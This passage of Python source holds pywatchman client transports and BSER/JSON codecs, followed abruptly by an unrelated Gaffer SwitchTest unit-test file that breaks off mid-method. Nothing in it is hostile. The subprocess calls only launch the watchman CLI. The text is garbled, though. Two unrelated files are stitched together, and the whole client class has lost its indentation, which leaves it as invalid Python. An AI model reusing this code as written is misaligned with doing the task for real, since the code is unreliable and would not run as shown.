        """Return the next newline-terminated line, without the newline.

        Maintains its own buffer; callers of the transport should not mix
        calls to readBytes and readLine.
        """
        if self.buf is None:
            self.buf = []

        # A previous read may already hold a complete line (e.g. when the
        # server sent unilateral responses).
        if len(self.buf) == 1 and b"\n" in self.buf[0]:
            line, remainder = self.buf[0].split(b"\n", 1)
            self.buf = [remainder]
            return line

        while True:
            chunk = self.readBytes(4096)
            if b"\n" not in chunk:
                self.buf.append(chunk)
                continue
            pending = b''.join(self.buf)
            line, remainder = chunk.split(b"\n", 1)
            self.buf = [remainder]
            return pending + line
class Codec(object):
    """Wire encoding used when talking to the watchman server."""

    transport = None

    def __init__(self, transport):
        self.transport = transport

    def receive(self):
        """Decode and return the next PDU; supplied by subclasses."""
        raise NotImplementedError()

    def send(self, *args):
        """Encode and transmit a request; supplied by subclasses."""
        raise NotImplementedError()

    def setTimeout(self, value):
        # Timeouts are a property of the underlying transport.
        self.transport.setTimeout(value)
class UnixSocketTransport(Transport):
    """Transport over a local unix domain socket."""

    sock = None

    def __init__(self, sockpath, timeout):
        self.sockpath = sockpath
        self.timeout = timeout

        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            sock.settimeout(self.timeout)
            sock.connect(self.sockpath)
        except socket.error as e:
            # Don't leak the fd when the connect fails.
            sock.close()
            raise SocketConnectError(self.sockpath, e)
        self.sock = sock

    def close(self):
        self.sock.close()
        self.sock = None

    def setTimeout(self, value):
        self.timeout = value
        self.sock.settimeout(self.timeout)

    def readBytes(self, size):
        try:
            chunk = self.sock.recv(size)
        except socket.timeout:
            raise SocketTimeout('timed out waiting for response')
        if not chunk:
            raise WatchmanError('empty watchman response')
        return chunk

    def write(self, data):
        try:
            self.sock.sendall(data)
        except socket.timeout:
            raise SocketTimeout('timed out sending query command')
def _get_overlapped_result_ex_impl(pipe, olap, nbytes, millis, alertable):
    """ Windows 7 and earlier does not support GetOverlappedResultEx. The
    alternative is to use GetOverlappedResult and wait for read or write
    operation to complete. This is done by using CreateEvent and
    WaitForSingleObjectEx. CreateEvent, WaitForSingleObjectEx
    and GetOverlappedResult are all part of Windows API since WindowsXP.
    This is the exact same implementation that can be found in the watchman
    source code (see get_overlapped_result_ex_impl in stream_win.c). This
    way, maintenance should be simplified.

    Returns a truthy value on success; on failure returns False with the
    thread's last-error value set, mirroring GetOverlappedResultEx.
    """
    log('Preparing to wait for maximum %dms', millis )
    if millis != 0:
        waitReturnCode = WaitForSingleObjectEx(olap.hEvent, millis, alertable)
        if waitReturnCode == WAIT_OBJECT_0:
            # Event is signaled, overlapped IO operation result should be available.
            pass
        elif waitReturnCode == WAIT_IO_COMPLETION:
            # WaitForSingleObjectEx returns because the system added an I/O
            # completion routine or an asynchronous procedure call (APC) to
            # the thread queue.
            SetLastError(WAIT_IO_COMPLETION)
            pass
        elif waitReturnCode == WAIT_TIMEOUT:
            # We reached the maximum allowed wait time, the IO operation failed
            # to complete in timely fashion.
            SetLastError(WAIT_TIMEOUT)
            return False
        elif waitReturnCode == WAIT_FAILED:
            # something went wrong calling WaitForSingleObjectEx
            err = GetLastError()
            log('WaitForSingleObjectEx failed: %s', _win32_strerror(err))
            return False
        else:
            # unexpected situation deserving investigation.
            err = GetLastError()
            log('Unexpected error: %s', _win32_strerror(err))
            return False

    # With millis == 0 (or the event signaled) just collect the result;
    # bWait=False means GetOverlappedResult does not block here.
    return GetOverlappedResult(pipe, olap, nbytes, False)
class WindowsNamedPipeTransport(Transport):
    """ connect to a named pipe """

    def __init__(self, sockpath, timeout):
        self.sockpath = sockpath
        # timeouts for overlapped I/O are expressed in milliseconds
        self.timeout = int(math.ceil(timeout * 1000))
        # left-over bytes from a prior ReadFile that the caller did not
        # consume; served before issuing another read
        self._iobuf = None

        self.pipe = CreateFile(sockpath, GENERIC_READ | GENERIC_WRITE, 0, None,
                               OPEN_EXISTING, FILE_FLAG_OVERLAPPED, None)

        if self.pipe == INVALID_HANDLE_VALUE:
            self.pipe = None
            self._raise_win_err('failed to open pipe %s' % sockpath,
                                GetLastError())

        # event for the overlapped I/O operations
        self._waitable = CreateEvent(None, True, False, None)
        if self._waitable is None:
            self._raise_win_err('CreateEvent failed', GetLastError())

        # Prefer the native GetOverlappedResultEx; fall back to the
        # emulation when it is missing or explicitly disabled.
        self._get_overlapped_result_ex = GetOverlappedResultEx
        if (os.getenv('WATCHMAN_WIN7_COMPAT') == '1' or
                self._get_overlapped_result_ex is None):
            self._get_overlapped_result_ex = _get_overlapped_result_ex_impl

    def _raise_win_err(self, msg, err):
        # Decorate the message with the expanded win32 error text.
        raise IOError('%s win32 error code: %d %s' %
                      (msg, err, _win32_strerror(err)))

    def close(self):
        if self.pipe:
            log('Closing pipe')
            CloseHandle(self.pipe)
        self.pipe = None

        if self._waitable is not None:
            # We release the handle for the event
            CloseHandle(self._waitable)
            self._waitable = None

    def setTimeout(self, value):
        # convert to milliseconds
        self.timeout = int(value * 1000)

    def readBytes(self, size):
        """ A read can block for an unbounded amount of time, even if the
        kernel reports that the pipe handle is signalled, so we need to
        always perform our reads asynchronously
        """

        # try to satisfy the read from any buffered data
        if self._iobuf:
            if size >= len(self._iobuf):
                res = self._iobuf
                # BUGFIX: this previously cleared ``self.buf`` (the
                # unrelated readLine buffer on Transport), leaving
                # ``_iobuf`` populated so the same stale bytes were
                # returned on every subsequent read.
                self._iobuf = None
                return res
            res = self._iobuf[:size]
            self._iobuf = self._iobuf[size:]
            return res

        # We need to initiate a read
        buf = ctypes.create_string_buffer(size)
        olap = OVERLAPPED()
        olap.hEvent = self._waitable

        log('made read buff of size %d', size)

        # ReadFile docs warn against sending in the nread parameter for async
        # operations, so we always collect it via GetOverlappedResultEx
        immediate = ReadFile(self.pipe, buf, size, None, olap)

        if not immediate:
            err = GetLastError()
            if err != ERROR_IO_PENDING:
                self._raise_win_err('failed to read %d bytes' % size,
                                    GetLastError())

        nread = wintypes.DWORD()
        if not self._get_overlapped_result_ex(self.pipe, olap, nread,
                                              0 if immediate else self.timeout,
                                              True):
            err = GetLastError()
            CancelIoEx(self.pipe, olap)

            if err == WAIT_TIMEOUT:
                log('GetOverlappedResultEx timedout')
                raise SocketTimeout('timed out after waiting %dms for read' %
                                    self.timeout)

            log('GetOverlappedResultEx reports error %d', err)
            self._raise_win_err('error while waiting for read', err)

        nread = nread.value
        if nread == 0:
            # Docs say that named pipes return 0 byte when the other end did
            # a zero byte write. Since we don't ever do that, the only
            # other way this shows up is if the client has gotten in a weird
            # state, so let's bail out
            CancelIoEx(self.pipe, olap)
            raise IOError('Async read yielded 0 bytes; unpossible!')

        # Holds precisely the bytes that we read from the prior request
        buf = buf[:nread]

        returned_size = min(nread, size)
        if returned_size == nread:
            return buf

        # keep any left-overs around for a later read to consume
        self._iobuf = buf[returned_size:]
        return buf[:returned_size]

    def write(self, data):
        olap = OVERLAPPED()
        olap.hEvent = self._waitable

        immediate = WriteFile(self.pipe, ctypes.c_char_p(data), len(data),
                              None, olap)

        if not immediate:
            err = GetLastError()
            if err != ERROR_IO_PENDING:
                self._raise_win_err('failed to write %d bytes' % len(data),
                                    GetLastError())

        # Obtain results, waiting if needed
        nwrote = wintypes.DWORD()
        if self._get_overlapped_result_ex(self.pipe, olap, nwrote,
                                          0 if immediate else self.timeout,
                                          True):
            log('made write of %d bytes', nwrote.value)
            return nwrote.value

        err = GetLastError()

        # It's potentially unsafe to allow the write to continue after
        # we unwind, so let's make a best effort to avoid that happening
        CancelIoEx(self.pipe, olap)

        if err == WAIT_TIMEOUT:
            raise SocketTimeout('timed out after waiting %dms for write' %
                                self.timeout)
        self._raise_win_err('error while waiting for write of %d bytes' %
                            len(data), err)
class CLIProcessTransport(Transport):
    """ open a pipe to the cli to talk to the service
    This intended to be used only in the test harness!

    The CLI is an oddball because we only support JSON input
    and cannot send multiple commands through the same instance,
    so we spawn a new process for each command.

    We disable server spawning for this implementation, again, because
    it is intended to be used only in our test harness. You really
    should not need to use the CLI transport for anything real.

    While the CLI can output in BSER, our Transport interface doesn't
    support telling this instance that it should do so. That effectively
    limits this implementation to JSON input and output only at this time.

    It is the responsibility of the caller to set the send and
    receive codecs appropriately.
    """
    proc = None
    closed = True

    def __init__(self, sockpath, timeout):
        self.sockpath = sockpath
        self.timeout = timeout

    def close(self):
        if self.proc:
            if self.proc.pid is not None:
                self.proc.kill()
            self.proc.stdin.close()
            self.proc.stdout.close()
            self.proc.wait()
            self.proc = None

    def _connect(self):
        # one-shot: reuse an existing process if present, else spawn one
        if self.proc:
            return self.proc
        args = [
            'watchman',
            '--sockname={0}'.format(self.sockpath),
            '--logfile=/BOGUS',
            '--statefile=/BOGUS',
            '--no-spawn',
            '--no-local',
            '--no-pretty',
            '-j',
        ]
        self.proc = subprocess.Popen(args,
                                     stdin=subprocess.PIPE,
                                     stdout=subprocess.PIPE)
        return self.proc

    def readBytes(self, size):
        self._connect()
        res = self.proc.stdout.read(size)
        # BUGFIX: the pipe is binary, so EOF is b''.  The old check
        # ``res == ''`` compared bytes to str and was always False on
        # Python 3, silently masking EOF.
        if not res:
            raise WatchmanError('EOF on CLI process transport')
        return res

    def write(self, data):
        if self.closed:
            self.close()
            self.closed = False
        self._connect()
        res = self.proc.stdin.write(data)
        # a single command per process: close stdin so the CLI runs it
        self.proc.stdin.close()
        self.closed = True
        return res
class BserCodec(Codec):
    """ use the BSER encoding. This is the default, preferred codec """

    def __init__(self, transport, value_encoding, value_errors):
        super(BserCodec, self).__init__(transport)
        # how (and whether) to decode string values in responses; passed
        # straight through to bser.loads
        self._value_encoding = value_encoding
        self._value_errors = value_errors

    def _loads(self, response):
        # subclasses override this to select other decode modes
        return bser.loads(
            response,
            value_encoding=self._value_encoding,
            value_errors=self._value_errors,
        )

    def receive(self):
        # read just enough header bytes (sniff_len) for bser.pdu_info to
        # tell us the total expected PDU length (elen)
        buf = [self.transport.readBytes(sniff_len)]
        if not buf[0]:
            raise WatchmanError('empty watchman response')

        _1, _2, elen = bser.pdu_info(buf[0])

        # keep reading chunks until the whole PDU has arrived
        rlen = len(buf[0])
        while elen > rlen:
            buf.append(self.transport.readBytes(elen - rlen))
            rlen += len(buf[-1])

        response = b''.join(buf)

        try:
            res = self._loads(response)
            return res
        except ValueError as e:
            # decode failures are surfaced as client errors
            raise WatchmanError('watchman response decode error: %s' % e)

    def send(self, *args):
        cmd = bser.dumps(*args)  # Defaults to BSER v1
        self.transport.write(cmd)
class ImmutableBserCodec(BserCodec):
    """ use the BSER encoding, decoding values using the newer
    immutable object support """

    def _loads(self, response):
        # the extra positional argument selects the immutable decode mode
        # provided by the bser extension
        return bser.loads(
            response,
            False,
            value_encoding=self._value_encoding,
            value_errors=self._value_errors,
        )
class Bser2WithFallbackCodec(BserCodec):
    """ use BSER v2 encoding when the server supports it, falling back
    to BSER v1 otherwise.

    The constructor performs the "version" handshake; until it completes,
    ``bser_version``/``bser_capabilities`` are unset and send() emits
    plain BSER v1.
    """

    def __init__(self, transport, value_encoding, value_errors):
        super(Bser2WithFallbackCodec, self).__init__(
            transport,
            value_encoding,
            value_errors,
        )
        if compat.PYTHON3:
            # BSER v1 is unusable under Python 3 (see BSERv1Unsupported),
            # so v2 becomes a hard requirement there.
            bserv2_key = 'required'
        else:
            bserv2_key = 'optional'

        self.send(["version", {bserv2_key: ["bser-v2"]}])

        capabilities = self.receive()

        if 'error' in capabilities:
            raise BSERv1Unsupported(
                'The watchman server version does not support Python 3. Please '
                'upgrade your watchman server.'
            )

        if capabilities['capabilities']['bser-v2']:
            self.bser_version = 2
            self.bser_capabilities = 0
        else:
            self.bser_version = 1
            self.bser_capabilities = 0

    def receive(self):
        buf = [self.transport.readBytes(sniff_len)]
        if not buf[0]:
            raise WatchmanError('empty watchman response')

        recv_bser_version, recv_bser_capabilities, elen = bser.pdu_info(buf[0])

        if hasattr(self, 'bser_version'):
            # Readjust BSER version and capabilities if necessary.
            # BUGFIX: the capability intersection was previously stored in
            # ``self.capabilities``, leaving ``bser_capabilities`` (the
            # attribute send() actually uses) untouched.
            self.bser_version = max(self.bser_version, recv_bser_version)
            self.bser_capabilities = \
                self.bser_capabilities & recv_bser_capabilities

        rlen = len(buf[0])
        while elen > rlen:
            buf.append(self.transport.readBytes(elen - rlen))
            rlen += len(buf[-1])

        response = b''.join(buf)

        try:
            return self._loads(response)
        except ValueError as e:
            raise WatchmanError('watchman response decode error: %s' % e)

    def send(self, *args):
        if hasattr(self, 'bser_version'):
            cmd = bser.dumps(*args, version=self.bser_version,
                             capabilities=self.bser_capabilities)
        else:
            # handshake not complete yet: default (v1) encoding
            cmd = bser.dumps(*args)
        self.transport.write(cmd)
class ImmutableBser2Codec(Bser2WithFallbackCodec, ImmutableBserCodec):
    """BSER v2 codec (with v1 fallback) that decodes values using the
    newer immutable object support inherited from ImmutableBserCodec."""
class JsonCodec(Codec):
    """ Use json codec. This is here primarily for testing purposes """

    json = None

    def __init__(self, transport):
        super(JsonCodec, self).__init__(transport)
        # the dependency on json is only paid for when this codec is used
        import json
        self.json = json

    def receive(self):
        line = self.transport.readLine()
        try:
            if compat.PYTHON3:
                # On Python 3, json.loads maps Unicode text to objects.
                # We usually see ASCII-only JSON with escapes, but valid
                # non-ASCII UTF-8 bytes can also arrive, so decode first.
                line = line.decode('utf-8')
            return self.json.loads(line)
        except Exception as e:
            print(e, line)
            raise

    def send(self, *args):
        cmd = self.json.dumps(*args)
        if compat.PYTHON3:
            # On Python 3, json.dumps returns a Unicode string even with
            # (the default) ensure_ascii=True; the transport wants bytes.
            cmd = cmd.encode('ascii')
        self.transport.write(cmd + b"\n")
class client(object):
""" Handles the communication with the watchman service """
sockpath = None
transport = None
sendCodec = None
recvCodec = None
sendConn = None
recvConn = None
subs = {} # Keyed by subscription name
sub_by_root = {} # Keyed by root, then by subscription name
logs = [] # When log level is raised
unilateral = ['log', 'subscription']
tport = None
useImmutableBser = None
def __init__(self,
sockpath=None,
timeout=1.0,
transport=None,
sendEncoding=None,
recvEncoding=None,
useImmutableBser=False,
# use False for these last two because None has a special
# meaning
valueEncoding=False,
valueErrors=False):
self.sockpath = sockpath
self.timeout = timeout
self.useImmutableBser = useImmutableBser
if inspect.isclass(transport) and issubclass(transport, Transport):
self.transport = transport
else:
transport = transport or os.getenv('WATCHMAN_TRANSPORT') or 'local'
if transport == 'local' and os.name == 'nt':
self.transport = WindowsNamedPipeTransport
elif transport == 'local':
self.transport = UnixSocketTransport
elif transport == 'cli':
self.transport = CLIProcessTransport
if sendEncoding is None:
sendEncoding = 'json'
if recvEncoding is None:
recvEncoding = sendEncoding
else:
raise WatchmanError('invalid transport %s' % transport)
sendEncoding = str(sendEncoding or os.getenv('WATCHMAN_ENCODING') or
'bser')
recvEncoding = str(recvEncoding or os.getenv('WATCHMAN_ENCODING') or
'bser')
self.recvCodec = self._parseEncoding(recvEncoding)
self.sendCodec = self._parseEncoding(sendEncoding)
# We want to act like the native OS methods as much as possible. This
# means returning bytestrings on Python 2 by default and Unicode
# strings on Python 3. However we take an optional argument that lets
# users override this.
if valueEncoding is False:
if compat.PYTHON3:
self.valueEncoding = encoding.get_local_encoding()
self.valueErrors = encoding.default_local_errors
else:
self.valueEncoding = None
self.valueErrors = None
else:
self.valueEncoding = valueEncoding
if valueErrors is False:
self.valueErrors = encoding.default_local_errors
else:
self.valueErrors = valueErrors
def _makeBSERCodec(self, codec):
def make_codec(transport):
return codec(transport, self.valueEncoding, self.valueErrors)
return make_codec
def _parseEncoding(self, enc):
if enc == 'bser':
if self.useImmutableBser:
return self._makeBSERCodec(ImmutableBser2Codec)
return self._makeBSERCodec(Bser2WithFallbackCodec)
elif enc == 'bser-v1':
if compat.PYTHON3:
raise BSERv1Unsupported(
'Python 3 does not support the BSER v1 encoding: specify '
'"bser" or omit the sendEncoding and recvEncoding '
'arguments')
if self.useImmutableBser:
return self._makeBSERCodec(ImmutableBserCodec)
return self._makeBSERCodec(BserCodec)
elif enc == 'json':
return JsonCodec
else:
raise WatchmanError('invalid encoding %s' % enc)
def _hasprop(self, result, name):
if self.useImmutableBser:
return hasattr(result, name)
return name in result
def _resolvesockname(self):
# if invoked via a trigger, watchman will set this env var; we
# should use it unless explicitly set otherwise
path = os.getenv('WATCHMAN_SOCK')
if path:
return path
cmd = ['watchman', '--output-encoding=bser', 'get-sockname']
try:
args = dict(stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=os.name != 'nt')
if os.name == 'nt':
# if invoked via an application with graphical user interface,
# this call will cause a brief command window pop-up.
# Using the flag STARTF_USESHOWWINDOW to avoid this behavior.
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
args['startupinfo'] = startupinfo
p = subprocess.Popen(cmd, **args)
except OSError as e:
raise WatchmanError('"watchman" executable not in PATH (%s)', e)
stdout, stderr = p.communicate()
exitcode = p.poll()
if exitcode:
raise WatchmanError("watchman exited with code %d" % exitcode)
result = bser.loads(stdout)
if 'error' in result:
raise WatchmanError('get-sockname error: %s' % result['error'])
return result['sockname']
def _connect(self):
""" establish transport connection """
if self.recvConn:
return
if self.sockpath is None:
self.sockpath = self._resolvesockname()
self.tport = self.transport(self.sockpath, self.timeout)
self.sendConn = self.sendCodec(self.tport)
self.recvConn = self.recvCodec(self.tport)
def __del__(self):
self.close()
def close(self):
if self.tport:
self.tport.close()
self.tport = None
self.recvConn = None
self.sendConn = None
def receive(self):
""" receive the next PDU from the watchman service
If the client has activated subscriptions or logs then
this PDU may be a unilateral PDU sent by the service to
inform the client of a log event or subscription change.
It may also simply be the response portion of a request
initiated by query.
There are clients in production that subscribe and call
this in a loop to retrieve all subscription responses,
so care should be taken when making changes here.
"""
self._connect()
result = self.recvConn.receive()
if self._hasprop(result, 'error'):
raise CommandError(result['error'])
if self._hasprop(result, 'log'):
self.logs.append(result['log'])
if self._hasprop(result, 'subscription'):
sub = result['subscription']
if not (sub in self.subs):
self.subs[sub] = []
self.subs[sub].append(result)
# also accumulate in {root,sub} keyed store
root = os.path.normpath(os.path.normcase(result['root']))
if not root in self.sub_by_root:
self.sub_by_root[root] = {}
if not sub in self.sub_by_root[root]:
self.sub_by_root[root][sub] = []
self.sub_by_root[root][sub].append(result)
return result
def isUnilateralResponse(self, res):
if 'unilateral' in res and res['unilateral']:
return True
# Fall back to checking for known unilateral responses
for k in self.unilateral:
if k in res:
return True
return False
def getLog(self, remove=True):
""" Retrieve buffered log data
If remove is true the data will be removed from the buffer.
Otherwise it will be left in the buffer
"""
res = self.logs
if remove:
self.logs = []
return res
def getSubscription(self, name, remove=True, root=None):
""" Retrieve the data associated with a named subscription
If remove is True (the default), the subscription data is removed
from the buffer. Otherwise the data is returned but left in
the buffer.
Returns None if there is no data associated with `name`
If root is not None, then only return the subscription
data that matches both root and name. When used in this way,
remove processing impacts both the unscoped and scoped stores
for the subscription data.
"""
if root is not None:
root = os.path.normpath(os.path.normcase(root))
if root not in self.sub_by_root:
return None
if name not in self.sub_by_root[root]:
return None
sub = self.sub_by_root[root][name]
if remove:
del self.sub_by_root[root][name]
# don't let this grow unbounded
if name in self.subs:
del self.subs[name]
return sub
if name not in self.subs:
return None
sub = self.subs[name]
if remove:
del self.subs[name]
return sub
def query(self, *args):
""" Send a query to the watchman service and return the response
This call will block until the response is returned.
If any unilateral responses are sent by the service in between
the request-response they will be buffered up in the client object
and NOT returned via this method.
"""
log('calling client.query')
self._connect()
try:
self.sendConn.send(args)
res = self.receive()
while self.isUnilateralResponse(res):
res = self.receive()
return res
except EnvironmentError as ee:
# When we can depend on Python 3, we can use PEP 3134
# exception chaining here.
raise WatchmanEnvironmentError(
'I/O error communicating with watchman daemon',
ee.errno,
ee.strerror,
args)
except WatchmanError as ex:
ex.setCommand(args)
raise
def capabilityCheck(self, optional=None, required=None):
""" Perform a server capability check """
res = self.query('version', {
'optional': optional or [],
'required': required or []
})
if not self._hasprop(res, 'capabilities'):
# Server doesn't support capabilities, so we need to
# synthesize the results based on the version
capabilities.synthesize(res, optional)
if 'error' in res:
raise CommandError(res['error'])
return res
def setTimeout(self, value):
    """Apply the same timeout to both the receive and send channels."""
    for conn in (self.recvConn, self.sendConn):
        conn.setTimeout(value)
| |
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import Gaffer
import GafferTest
class SwitchTest( GafferTest.TestCase ) :

	# Tests for Gaffer's switch nodes : nodes that route one of several
	# "in*" input plugs to a single "out" plug, selected by an "index"
	# plug and gated by an "enabled" plug.

	def intSwitch( self ) :

		# Helper : build a SwitchComputeNode with dynamic IntPlug in/out.
		result = Gaffer.SwitchComputeNode()
		result["in"] = Gaffer.IntPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
		result["out"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )

		return result

	def colorSwitch( self ) :

		# Helper : build a SwitchComputeNode with dynamic Color3fPlug in/out,
		# for exercising compound (multi-child) plugs.
		result = Gaffer.SwitchComputeNode()
		result["in"] = Gaffer.Color3fPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
		result["out"] = Gaffer.Color3fPlug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )

		return result

	def intPlug( self, value ) :

		# Helper : a free-standing IntPlug holding `value`, suitable for
		# connecting to a switch input.
		result = Gaffer.IntPlug()
		result.setValue( value )

		# we need to keep it alive for the duration of the
		# test - it'll be cleaned up in tearDown().
		self.__inputPlugs.append( result )

		return result

	def colorPlug( self, value ) :

		# Helper : a free-standing Color3fPlug holding `value`.
		result = Gaffer.Color3fPlug()
		result.setValue( value )

		# we need to keep it alive for the duration of the
		# test - it'll be cleaned up in tearDown().
		self.__inputPlugs.append( result )

		return result

	def test( self ) :

		# Basic routing : the output hash and value track whichever input
		# the index selects.
		n = self.intSwitch()
		n["in"].setInput( self.intPlug( 0 ) )
		n["in1"].setInput( self.intPlug( 1 ) )
		n["in2"].setInput( self.intPlug( 2 ) )

		n["index"].setValue( 0 )
		self.assertEqual( n["out"].hash(), n["in"].hash() )
		self.assertEqual( n["out"].getValue(), n["in"].getValue() )

		n["index"].setValue( 1 )
		self.assertEqual( n["out"].hash(), n["in1"].hash() )
		self.assertEqual( n["out"].getValue(), n["in1"].getValue() )

		n["index"].setValue( 2 )
		self.assertEqual( n["out"].hash(), n["in2"].hash() )
		self.assertEqual( n["out"].getValue(), n["in2"].getValue() )

	def testCorrespondingInput( self ) :

		# The switch reports the first input as the pass-through partner
		# of the output.
		n = self.intSwitch()
		self.assertTrue( n.correspondingInput( n["out"] ).isSame( n["in"] ) )

	def testDisabling( self ) :

		# Disabling the switch falls back to the first input, regardless
		# of the index; re-enabling restores index-based routing.
		n = self.intSwitch()
		n["in"].setInput( self.intPlug( 0 ) )
		n["in1"].setInput( self.intPlug( 1 ) )

		n["index"].setValue( 1 )
		self.assertEqual( n["out"].hash(), n["in1"].hash() )
		self.assertEqual( n["out"].getValue(), n["in1"].getValue() )

		n["enabled"].setValue( False )
		self.assertEqual( n["out"].hash(), n["in"].hash() )
		self.assertEqual( n["out"].getValue(), n["in"].getValue() )

		n["enabled"].setValue( True )
		self.assertEqual( n["out"].hash(), n["in1"].hash() )
		self.assertEqual( n["out"].getValue(), n["in1"].getValue() )

		self.assertTrue( n["enabled"].isSame( n.enabledPlug() ) )

	def testAffects( self ) :

		# Every control and input plug affects only the output plug; the
		# output itself affects nothing.
		n = self.intSwitch()
		n["in"].setInput( self.intPlug( 0 ) )
		n["in1"].setInput( self.intPlug( 0 ) )

		for name in [ "enabled", "index", "in", "in1" ] :
			a = n.affects( n[name] )
			self.assertEqual( len( a ), 1 )
			self.assertTrue( a[0].isSame( n["out"] ) )

		self.assertEqual( n.affects( n["out"] ), [] )

	def testOutOfRangeIndex( self ) :

		n = self.intSwitch()
		n["in"].setInput( self.intPlug( 0 ) )
		n["in1"].setInput( self.intPlug( 1 ) )
		n["in2"].setInput( self.intPlug( 2 ) )

		n["index"].setValue( 2 )
		self.assertEqual( n["out"].hash(), n["in2"].hash() )
		self.assertEqual( n["out"].getValue(), n["in2"].getValue() )

		# wrap around if the index is out of range
		n["index"].setValue( 3 )
		self.assertEqual( n["out"].hash(), n["in"].hash() )
		self.assertEqual( n["out"].getValue(), n["in"].getValue() )

		n["index"].setValue( 4 )
		self.assertEqual( n["out"].hash(), n["in1"].hash() )
		self.assertEqual( n["out"].getValue(), n["in1"].getValue() )

		n["index"].setValue( 5 )
		self.assertEqual( n["out"].hash(), n["in2"].hash() )
		self.assertEqual( n["out"].getValue(), n["in2"].getValue() )

	def testAffectsIgnoresAdditionalPlugs( self ) :

		# Plugs that merely *look* like inputs (including names starting
		# with "in") must not be treated as part of the input branch.
		n = self.intSwitch()
		n["myPlug"] = Gaffer.IntPlug()
		n["indubitablyNotAnInputBranch"] = Gaffer.IntPlug()
		n["in2dubitablyNotAnInputBranch"] = Gaffer.IntPlug()

		self.assertEqual( n.affects( n["myPlug"] ), [] )
		self.assertEqual( n.affects( n["indubitablyNotAnInputBranch"] ), [] )
		self.assertEqual( n.affects( n["in2dubitablyNotAnInputBranch"] ), [] )

	def testCompoundPlugs( self ) :

		# Same routing behaviour, but with compound (Color3f) plugs.
		n = self.colorSwitch()
		n["in"].setInput( self.colorPlug( IECore.Color3f( 0, 0.1, 0.2 ) ) )
		n["in1"].setInput( self.colorPlug( IECore.Color3f( 1, 1.1, 1.2 ) ) )
		n["in2"].setInput( self.colorPlug( IECore.Color3f( 2, 2.1, 2.2 ) ) )

		n["index"].setValue( 0 )
		self.assertEqual( n["out"].hash(), n["in"].hash() )
		self.assertEqual( n["out"].getValue(), n["in"].getValue() )

		n["index"].setValue( 1 )
		self.assertEqual( n["out"].hash(), n["in1"].hash() )
		self.assertEqual( n["out"].getValue(), n["in1"].getValue() )

		n["index"].setValue( 2 )
		self.assertEqual( n["out"].hash(), n["in2"].hash() )
		self.assertEqual( n["out"].getValue(), n["in2"].getValue() )

	def testSerialisation( self ) :

		# Round-trip a connected switch through script serialisation and
		# check the dynamic inputs and routing survive.
		script = Gaffer.ScriptNode()

		script["s"] = self.intSwitch()
		script["a1"] = GafferTest.AddNode()
		script["a2"] = GafferTest.AddNode()

		script["a1"]["op1"].setValue( 1 )
		script["a2"]["op2"].setValue( 2 )

		script["s"]["in"].setInput( script["a1"]["sum"] )
		script["s"]["in1"].setInput( script["a2"]["sum"] )

		script2 = Gaffer.ScriptNode()
		script2.execute( script.serialise() )

		self.assertTrue( "in" in script2["s"] )
		self.assertTrue( "in1" in script2["s"] )
		self.assertTrue( "in2" in script2["s"] )
		self.assertFalse( "in3" in script2["s"] )

		self.assertEqual( script2["s"]["out"].getValue(), 1 )
		script2["s"]["index"].setValue( 1 )
		self.assertEqual( script2["s"]["out"].getValue(), 2 )

	def testIndexExpression( self ) :

		# With a constant index, the switch optimises to a direct internal
		# connection; a context-varying expression on the index must
		# disable that optimisation (and removal must restore it).
		script = Gaffer.ScriptNode()

		script["s"] = self.intSwitch()
		script["a1"] = GafferTest.AddNode()
		script["a2"] = GafferTest.AddNode()

		script["a1"]["op1"].setValue( 1 )
		script["a2"]["op2"].setValue( 2 )

		script["s"]["in"].setInput( script["a1"]["sum"] )
		script["s"]["in1"].setInput( script["a2"]["sum"] )

		# Should be using an internal connection for speed
		self.assertTrue( script["s"]["out"].getInput() is not None )

		script["expression"] = Gaffer.Expression()
		script["expression"]["engine"].setValue( "python" )
		script["expression"]["expression"].setValue( 'parent["s"]["index"] = int( context.getFrame() )' )

		# Should not be using an internal connection, because the result
		# varies with context.
		self.assertTrue( script["s"]["out"].getInput() is None )

		with script.context() :

			script.context().setFrame( 0 )
			self.assertEqual( script["s"]["out"].getValue(), 1 )

			script.context().setFrame( 1 )
			self.assertEqual( script["s"]["out"].getValue(), 2 )

		del script["expression"]

		# Should be using an internal connection for speed now the expression has
		# been removed.
		self.assertTrue( script["s"]["out"].getInput() is not None )

	def testDependencyNodeSwitch( self ) :

		# SwitchDependencyNode routes by static connection rather than
